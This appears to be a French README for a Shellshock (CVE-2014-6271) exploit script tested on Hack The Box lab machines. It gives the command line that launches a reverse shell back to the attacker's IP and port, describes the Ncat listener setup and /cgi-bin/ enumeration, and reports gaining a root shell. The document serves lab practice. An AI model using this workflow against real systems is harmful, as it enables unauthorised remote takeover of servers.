
Exploit Shellshock, alias CVE-2014-6271
Exploit Shellshock, alias CVE-2014-6271.
Testé sur Bash 3.2 et Bash 4.2.
Pour plus d'informations sur la vulnérabilité, visitez : https://nvd.nist.gov/vuln/detail/CVE-2014-6271
L'exploit a été principalement testé sur Hack The Box dans les machines suivantes :
Beep : https://app.hackthebox.eu/machines/BeepShocker : https://app.hackthebox.eu/machines/ShockerSinon, si vous obtenez un 403 sur le répertoire /cgi-bin/, essayez d'énumérer les fichiers
de ce répertoire avec une bonne wordlist, en recherchant les extensions .sh ou .cgi.
REMARQUE : N'oubliez pas de configurer votre listener TCP, sinon l'exploit pourrait vous donner un faux positif lors de la vérification de l'appel testRevShell
Tout d'abord, nous pouvons voir les arguments que prend l'exploit en exécutant : shellshock.py -h
Ensuite, nous pouvons configurer un listener Ncat sur un port de notre choix ; ici, j'ai choisi le 45
Ensuite, nous pouvons exécuter l'exploit en fournissant tous les arguments qu'il prend en exécutant :
shellshock.py [OUR_IP] [OUR_LISTENNING_PORT] [TARGET_URL]
L'URL cible ici, comme vous pouvez le voir, est l'endroit où le serveur web envoie une requête POST lors de l'authentification sur cette machine
Ici, comme nous pouvons le voir dans la sortie, l'exploit a essayé d'envoyer la charge utile via SSL en utilisant plusieurs versions de TLS, jusqu'à ce qu'il réussisse
Et ici, nous avons obtenu notre reverse shell ! Par chance, le serveur web s'exécutait en tant que root.